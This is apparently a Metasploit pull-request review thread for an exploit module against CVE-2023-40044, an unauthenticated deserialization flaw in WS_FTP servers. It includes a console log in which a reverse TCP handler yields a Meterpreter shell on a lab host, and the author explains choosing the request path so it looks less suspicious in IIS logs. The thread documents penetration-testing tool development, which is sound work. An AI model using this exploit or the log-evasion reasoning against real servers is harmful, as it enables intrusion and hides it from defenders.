Exploit module for CVE-2023-40044 (WS_FTP unauthenticated RCE)

[sfewer-r7]

This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.

For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.

msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected a build date of 28-2-2023
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49771) at 2023-10-02 11:46:47 +0100

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 

[jvoisin]

Suggested change

	execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server
	execution against a vulnerable WS_FTP server running the installed by default Ad Hoc Transfer module. All versions of WS_FTP server

[jvoisin]

Suggested change

	prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.
	prior to 8.7.4 and 8.8.2 are vulnerable to this issue.

[jvoisin]

Shouldn't this method use TARGET_URI?

[sfewer-r7]

The TARGET_URI is only used in the exploit method to trigger the vulnerability. The default value /AHT/ works, but due to the how the underlying vuln works, you can change the TARGET_URI to be anything so long as it begins with /AHT/. You may want to do this to affect what appears in the IIS logs.

It would not make sense to use it in the check method as we want to get specific URI's to determine the vulnerable state of the target.

[jvoisin]

You might want to either document this, or even better, simply use a random string?

[sfewer-r7]

Fair point, I will add some documentation around this. My thinking on keeping the TARGET_URI as /AHT/ is that it looks less suspicious in the logs than using something like a random string, e.g the IIS log entry:

2023-10-03 09:07:56 192.168.86.50 POST /AHT/ - 443 - 192.168.86.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36+Edg/114.0.1823.51 - 302 0 0 277

compared to this (I manually edited the below to create an example):

2023-10-03 09:07:56 192.168.86.50 POST /AHT/shfkshkjs - 443 - 192.168.86.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36+Edg/114.0.1823.51 - 302 0 0 277

However I wanted to keep the TARGET_URI as a user option to allow for configuration if needed (e.g. testing detection rules or whatever).

[sfewer-r7]

Added some comments and a better OptString description in 2eacb75

[jvoisin]

Suggested change

	if title == 'Ad Hoc Transfer'
	if title != 'Ad Hoc Transfer'
	CheckCode::Unknown
	endif

Inverting the condition will reduce the nested indentation level :)

[sfewer-r7]

I liked how the fall through for the check method ends with CheckCode::Unknown and there is no other path to return CheckCode::Unknown. 3 levels of indentation seems acceptable to me. Happy to do it differently if there is a preferred convention on this.

[jvoisin]

The download link for the free/trial version has been taken down

[smcintyre-r7]

This is no longer necessary. You should be able to completely remove this code, the mixin inclusion, and the target definition. Users can now use the powershell adapter payloads added in #16548 (one of cmd/windows/powershell/*).

As a module author, the adapters allow you to simply define the command target and the framework will handle the rest.

[sfewer-r7]

That's cool, I didn't realize this existed! Implemented in 1be8e02

[smcintyre-r7]

Can this be updated to use the rex-mime API?

[sfewer-r7]

Implemented in 8431d11

[smcintyre-r7]

Code all looks good to me now. Due to Progress taking down the trail of WS_FTP, I was unable to get this installed. @sfewer-r7 shared a video demonstration of both the latest and a previous version along with the corresponding PCAPs which demonstrate that this exploit module is working as intended.

I'll have this landed in a moment. Thank you Stephen!

[sfewer-r7]

Super, thank you @smcintyre-r7 and @jvoisin for reviewing this.

[grantwillcoxh3ai]

Quick question but shouldn't there be two targets for this? Documentation implies you can use the windows/x64/meterpreter/reverse_tcp payload and use a target 1 for Windows Powershell? Seems like the exploit only supports one target right now so just wanted to double check that.

[sfewer-r7]

good catch @grantwillcoxh3ai, thanks. I forgot to update the doc after commit 1be8e02. I will submit a fix for this in a little while.

[sfewer-r7]

I opened #18424 to update the documentation, apologies for missing this first time around.

[grantwillcoxh3ai]

All good, thanks for clarifying! 👍

[jharris-r7]

Release Notes

This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.